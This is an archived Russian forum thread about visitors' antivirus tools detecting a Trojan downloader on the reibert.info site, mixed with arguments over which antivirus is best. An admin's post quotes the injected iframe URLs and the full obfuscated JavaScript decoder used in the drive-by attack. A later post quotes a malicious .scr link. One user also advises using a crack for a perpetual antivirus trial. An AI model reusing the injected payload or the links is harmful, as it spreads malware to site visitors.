Просмотр полной версии : Как бороться с троянами на этом сайте!
Kolyamba
02.03.2007, 20:53
Или. Почему админы ничего с этим не делают? Слава богу на моей ХР NOD32 стоит! А виста без антивиря... крепкая однако, пока не заболела.
Товарищи модеры и админы! Вам что, пофиг на своих посетителей или так и надо? Т.е. троянов к себе запускать на комп!:mad: :mad: :mad:
Что-то не верится что отсюда.
Zugunder
02.03.2007, 21:47
У меня тоже сегодня експлорер полеетел из-за трояна... Вроде никуда больше не залазил :(
Kolyamba
02.03.2007, 22:54
Что-то не верится что отсюда.
А ты удали своего сра...го каспера или вэба, и поставь НОД32! Узнаешь сразу что и откуда! :)
Архивариус
02.03.2007, 23:30
Полное название трояна напишите.
Обновляйте почаще антивирусные базы!! А вирусня может пролезть разными способами! Вирусняк может попасть на комп при подключении к провайдеру, еще до того как вы зайдете на сайт и т.д. и т.п.
Так что не спешите обвинять админов!!! Думаю что админ следит за своим серваком....
Otto Kreer
03.03.2007, 09:10
У меня тоже НОД32 и где то дважды при заходе чисто на сайт Раиберт симафорил о трояне. Сейчас этого не наблюдаю.
Только написал єто - зашол туда и вылез сразу троян - к сожалению не записался скрин...
vagabondo
03.03.2007, 10:44
у меня тоже после райберта експлорер рухнул
Kolyamba
03.03.2007, 10:51
Полное название трояна напишите.
Какой-то Trojan Downloader. Принт-скрин не получается- пустое белое окно в центре изображения сайта, вместо окна информации! Видимо НОД не дает копировать свое изображение... :) И этот троян только на главной странице reibert.info
Kolyamba
03.03.2007, 10:54
Обновляйте почаще антивирусные базы!! А вирусня может пролезть разными способами! Вирусняк может попасть на комп при подключении к провайдеру, еще до того как вы зайдете на сайт и т.д. и т.п.
Так что не спешите обвинять админов!!! Думаю что админ следит за своим серваком....
Согласен с тобой. Но я и не обвиняю хозяев! Я предположил, что может это специально так сделано, а может поганые хакеры замутили что... Это прямо как на astalavista.com- УЖАС!!! :eek:
Kolyamba
03.03.2007, 10:57
Обновляйте почаще антивирусные базы!!
Обновляй, не обновляй, а если у тебя каспер:p или доктор вэб:p , то им похрен на трояны, особенно на сайтах! Проверено годами на сотнях машин с постоянным подключением к интернету- NOD32 рулит!!!
Это не реклама! Просто пишу :) чем реально защититься!
Обновляй, не обновляй, а если у тебя каспер:p или доктор вэб:p , то им похрен на трояны, особенно на сайтах! Проверено годами на сотнях машин с постоянным подключением к интернету- NOD32 рулит!!!
Это не реклама! Просто пишу :) чем реально защититься!
Согласен на 100% касперы и вэбы в топку!!! NOD отличный антивирусник!
А мы пользуемся на работе Symantec Antivirus Corporate Edition вроде ниче, все ловит!!:)
Dzinters
03.03.2007, 12:35
вай. почитал, ща пойду устанавливать...
не установился, пишет, что винда 98/миллениум сильно древняя, посоветуйте, пожалуйста (раз уж тема антивирусов возникла), какую программу установить (естественно, кроме касперского или доктора вэба)...
Kolyamba
03.03.2007, 13:12
вай. почитал, ща пойду устанавливать...
не установился, пишет, что винда 98/миллениум сильно древняя, посоветуйте, пожалуйста (раз уж тема антивирусов возникла), какую программу установить (естественно, кроме касперского или доктора вэба)...
На сайте www.eset.com есть пункт Download. Выбери свою операционку и качай. Потом в нэте ищи NOD32 Fix. По окончанию установки нода выбери Перезагрузиться позже!!! Ставь фикс сразу после установки нода, в туже директорию. !!! :) Жми Перезагрузка компа и радуйся вечному триалу с обновлениями!!!!
Kolyamba
03.03.2007, 13:37
32240
Otto Kreer
03.03.2007, 14:06
Ну мог бы уже крупнее бабахнуть картинку :-))
Вот он Радимый !
Ха ! А у меня такая проблема была с Тризной. При входе на сайт! Вылазило оповищение ТРОЯН!!!! Но после лечения все ОК. И с Тризны он пропал, так как админы его забанили пожизнено
Dzinters
03.03.2007, 14:38
ого! странно всё это как-то. надо срочно готовить резерв ставки...
ARTUR PHLEPS
03.03.2007, 20:36
камрады я с вами несогласен у меня лицензионыи каспер -никоких проблем поверте а трояны нападают почти кажды третии заход на саит
Вчера зашёл на сайт, неделю не заходил - и сразу троян в инкубаторе.
А я то думаю, откуда он?
Kolyamba
03.03.2007, 22:01
камрады я с вами несогласен у меня лицензионыи каспер -никоких проблем поверте а трояны нападают почти кажды третии заход на саит
Я тебе верю! Но если бы твое привидение ловило бы троян при каждом твоем заходе на сайт, вот тогда ты был бы почти полностью уверен, что ничего не проскочило снова! :) Выкинь свой каспер, ставь НОД. Не обязательно триал. Можешь купить! :)
ARTUR PHLEPS
03.03.2007, 22:20
а зачем выкидывать каспер и так предупреждает об этом а потом можно раз в неделю просканировать и все проблемы
Каспер очень тупит систему. Много упускает.. впрочем это свойственно многим антивирусам. Нет идиального. Сам юзаю Nod 32 но и он пропустил сегодня с сфорума win32 тра ля ля трояна. И не заметил если бы не фаервол Zonealart. Проблема есть! Пути решения у админов.
Троян есть. Его нельзя не есть. У меня антивир его послал в карантин. Но он всеравно возбухает периодически. Стоит Аваст.
Троян есть. Его нельзя не есть. У меня антивир его послал в карантин. Но он всеравно возбухает периодически. Стоит Аваст.У меня тоже пол года, до сегодняшнего дня стоял Аваст,я его удалил и поставил Dr.WEB,в результате кучу троянов нашол.
Kolyamba
03.03.2007, 23:18
"Сам юзаю Nod 32 но и он пропустил сегодня с сфорума win32 тра ля ля трояна. И не заметил если бы не фаервол Zonealart. Проблема есть! Пути решения у админов."
Скачай последню версию и обновляй постоянно. А каспера продавать надо врагам, что-бы у них компы тупили...
Kolyamba
03.03.2007, 23:20
У меня тоже пол года, до сегодняшнего дня стоял Аваст,я его удалил и поставил Dr.WEB,в результате кучу троянов нашол.
А теперь поставь НОД! Вот удивишься! :)
А кто что скажет про AVIRA ?
А кто что скажет про AVIRA ?Тоже была,и тоже кучу вирусов после AVIRы.
У меня вообще ничего не стоит...Заморачиваться еще с ними...Пущай жрут,сволочи.Переустановлю,не обломаюсь.
У меня вообще ничего не стоит...Заморачиваться еще с ними...Пущай жрут,сволочи.Переустановлю,не обломаюсь.
:D :D :D
Скачай последню версию и обновляй постоянно. А каспера продавать надо врагам, что-бы у них компы тупили...
Стоит автообновление. Так что как-только появляеться новенькое сразу качаю. Дело не в обновлениях в хитрости вирусов. сам процесс попадания на комп может быть пропущен А.В.П но потом он его находит при сканировании.
major_oleg
04.03.2007, 18:24
А ты удали своего сра...го каспера или вэба, и поставь НОД32! Узнаешь сразу что и откуда! :)
:mad: :mad: :mad: Это КАСПЕР то ??? НОД - ф.фло!!! :p
major_oleg
04.03.2007, 18:31
:D Полностью согласен и солидарен !!! КАСПЕР - ЛУЧШИЙ !!!:p :p :p
major_oleg
04.03.2007, 18:37
Каспер очень тупит систему. Много упускает.. впрочем это свойственно многим антивирусам. Нет идиального. Сам юзаю Nod 32 но и он пропустил сегодня с сфорума win32 тра ля ля трояна. И не заметил если бы не фаервол Zonealart. Проблема есть! Пути решения у админов.
:mad: Распространенный ПРЕДРАСУДОК !!!
Лучше и надежнее защиты чем KASPERSKY INTERNET SECURITY 6.0.1.411 (MP-1) для Windows XP или 6.0.2.614 (МР-2) для Windows Vista НЕТ И НЕ ПРИДУМАНО НИКЕМ!!! ЛАБОРАТОРИЯ КАСПЕРСКОГО - РУЛИТ!!!:p :p :p
И систему, между прочим, ПРАКТИЧЕСКИ НЕ ТОРМОЗИТ !!!
major_oleg
04.03.2007, 18:40
У меня тоже пол года, до сегодняшнего дня стоял Аваст,я его удалил и поставил Dr.WEB,в результате кучу троянов нашол.
:D Не мудрено... Аваст- это не защита...Тем более для интернета... ;)
Др.Веб тоже не выход... У него нет сетевого экрана... Лучше всего - Касперский...
Kolyamba
04.03.2007, 19:26
[QUOTE=major_oleg;149096]:mad: :mad: :mad: Это КАСПЕР то ??? НОД - ф.фло!!! :p[/QUO
Ты наверно лунявка? Это почему НОД фуфло??? Точно ты лунь. Каспер это российская панацея, и полня херня!!!
Kolyamba
04.03.2007, 19:28
:D Не мудрено... Аваст- это не защита...Тем более для интернета... ;)
Др.Веб тоже не выход... У него нет сетевого экрана... Лучше всего - Касперский...
Поставь НОД. Проверь!
начали за трояны на Райберте, а закончили обсуждением антивиров, хотя, это спор бесконечный и безперспективный ИМХО
Walter Witt
05.03.2007, 01:02
У меня был Касперский.Каждый раз когда я заходил на Рейберт высвечивало что на сайте обнаружен опасный сценарий,а потом Троян Давнлоадер.Троян причем хороший ибо задел операционку ( пришлось винду переустанавливать).Вирус блоканул постаянную защиту Касперского , потом весь антивирус нафиг,а потом операционку задел.
И вобще антивирус Касперского фуфло ибо он обнаруживает вирус но не удаляет его.Когда у меня на компе было 6 вирусов Касперский при проверке нифига необнаружил,поставил НОД все 6 вирусов нашел и удалил(реклама) ;)
Каждый раз как захожу на САЙТ мой AntiVir Guard ловит 3-9 троянов...
... нехорошо это как то...
:"(
Bombardir
05.03.2007, 11:24
бывает кстати иногда антивирус работу счетчика посещений принимает за троян,видимо из за того что счетчики фиксируют разные данные посетителей типа установленой ос языка и тд
почему то не вижу постов администрации по этому поводу. было интерессно услышать что они скажут... а то мы тут воду толчём.
У меня, когда вишу на Райберте, Аваст постоянно выдает - "Заблокирован сетевой экран. Аткака с адреса.... ну и айпишник далее".
Kolyamba
05.03.2007, 15:10
Моя Виста мне ругается Брэндмауэром когда загружаю фото на сайт Райберта, "Разрешить или Не разрешать доступ к чего-то там Вашего браузера?" Жму Нет. И вирей никаких. Все-таки, хоть и параноидальная эта винда, но живучесть и защита на высоте! XP и в подметки ей не годится... :)
Kolyamba
05.03.2007, 15:11
почему то не вижу постов администрации по этому поводу. было интерессно услышать что они скажут... а то мы тут воду толчём.
Согласен. Где же реплики в свою защиту и оправдание от модеров и админов???
У меня стоит Антивр, но он ничего не видит, много я уже слышал об этих троянах на сайте, но ничего сделать не могу... мои антивирусы его не видят, на сервере стоит лицензионный др.веб. который постоянно мониторит сайт, но тоже ничего никогда не находил. Честно - не заню в чем может быть дело.
У меня тоже АНТИВИР , и аналогично - ни разу не срабатывал на форуме, хотя в реале, по ходу ловит супостатов... ?:rolleyes:
Ну во-первых не нужно переходить на грубость.
Во-вторых вы оперируете неподтвержденными фактами.
И в третьих можете быть уверены на 100% что я компетентен в вопросах компьютерной безопасности, и вполне могу обходиться даже без антивируса.
Далее по теме. Я тоже пользуюсь AntiVir. И все, что нужно он находит.
Тем не менее и НОД и Аваст тоже хороший выбор.
Насчет броузеров - советую IE вообще в интернете не использовать.
Это ДЫРА. Используйте лучше Firefox.
Проблема с главной страницей сайта вот в чем - кто-то (злоумышленник) добавил туда код "невидимого" встроенного фрейма. Этот фрейм внутри себя грузит еще один с другого сайта, который в свою очередь содержит зашифрованый код на JavaScript. И вполне вероятно, что этот код как раз и грузить эту фигню.
Повторюсь, я работаю по Firefox, и мне это все пох. B)
Последовательность линков во фреймах:
1. http://www.radiodeejay.hr/forum/lang/inexed.htm
2. http://life.c-commando.info/css3/index.php
3. Код на JavaScript (так, просто):
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,25, 22,18,19,21,20,31,47,48,0,0,0,0,0,0,24,43,15,23,59 ,36,0,14,17,44,41,58,46,30,60,51,42,9,1,28,38,3,27 ,6,33,29,5,0,0,0,0,56,0,62,7,8,49,45,34,2,16,40,12 ,13,50,53,52,32,4,61,11,54,55,57,35,37,10,26,39);f or(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("gU")</script>
Сейчас Тёмыча оповещу.
Исправил. Кажется проблема решена...?
Otto Kreer
06.03.2007, 10:46
Исправил. Кажется проблема решена...?
Не, ну это беспредел !!! Куда троян делся ??? !!!
И шо теперь тему закрывать ? :D :D :D
Вроде как и быстрее форум стал работать... или это субьективно.
troops of doom
06.03.2007, 17:08
меня тоже долбят..трояны..
Kolyamba
06.03.2007, 22:55
Вроде как и быстрее форум стал работать... или это субьективно.
И правда. Летает! :eek:
Камерады а где можно скачать этот NOD32 ?
Название трояна ничего не даст .Их превеликое множество в названиях.Был у меня Док.Вэб,но он сканировал толькои находил троянов.Каспер их не хотел видеть(лицензионный )Поудалял оба.Поставил неделю назад AVAST.Прекрасная прога.20 минут назад заходил на сайтик один,так он мне написал что там то и там сидитWin32:Mkar черьви.Я доволен.
Hans Westmar
20.04.2007, 16:24
Когда у меня не было антивира я подхватил троян TrojanProxy.cimuz.NAH Загадил оперативку и системные файлы.Причем удалить его и выполнить другие действия нельзя.Полетела винда.Сейчас стоит NOD 32 все обновляется,ничего не пропускается.И файрвол тоже обязательно.
Bombardir
20.04.2007, 17:07
вот чем хорош аваст так это тем что он сканирует на вирусы до загрузки винды,поэтому он может удалить любой вирус
Вчера дал приятелю прогу АВАСТ.У него вообще ативиря не было никогда.Год точно без него.Постоянно жалуется на комп.То это не так ,то другое тупит.Звонит через два часа и шокированный сообщает что обнаружил и убил 830! вирусяк.Черви,трояны и прочая гадость.Ну уж если так,то хвала конечно.
Сегодня пришло на ящик. Я подписан на тему, приходит сообщение по теме:
Дорогой(ая) vadim30,
Bombardir только что ответил в теме, на которую Вы подписались - награды и знаки Германия - в разделе Продам Форум сайта REIBERT.info.
Эта тема расположена по адресу: http://reibert.info/forum/showthread.php?t=14662&goto=newpost
Вот размещенное сообщение:
№5 и 9 резервPS выхватите кста :) супер скрин ! минут 10 отойти не мог :))))
http://screensavers4us.info/funscr/silly_bear32_funny.scr
Также могут быть и другие сообщения, но Вы не будете получать уведомления, пока снова не посетите форум.
С наилучшими пожеланиями,
Форум сайта REIBERT.info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Отказ от подписки:
Чтобы отказаться от получения рассылки по этой теме, Пожалуйста, перейдите на страницу: http://reibert.info/forum/subscription.php?do=usub&t=14662
Чтобы отказаться от получения рассылки по ВСЕМ темам, Пожалуйста, перейдите на страницу: http://reibert.info/forum/subscription.php?do=viewsubscription&folderid=all
Выделил красным то, чего в теме нет. Где оно прцепилось, я не знаю..
Если идешь по ссылке, ловишь на комп червя!
По сообщениям с других тем, такого не замечал.
Hamster`
27.06.2007, 23:47
За два первых дня на форуме славил 8 червей, и отбил N-oe количество атак. Не на одном сайте у меня такого не было. Раньше пользовался Каспером, Dr.Web, Nod-32, AVG, сейчас остановился на АVAST!
vBulletin® v3.8.4, Copyright ©2000-2012, Jelsoft Enterprises Ltd. Перевод: zCarot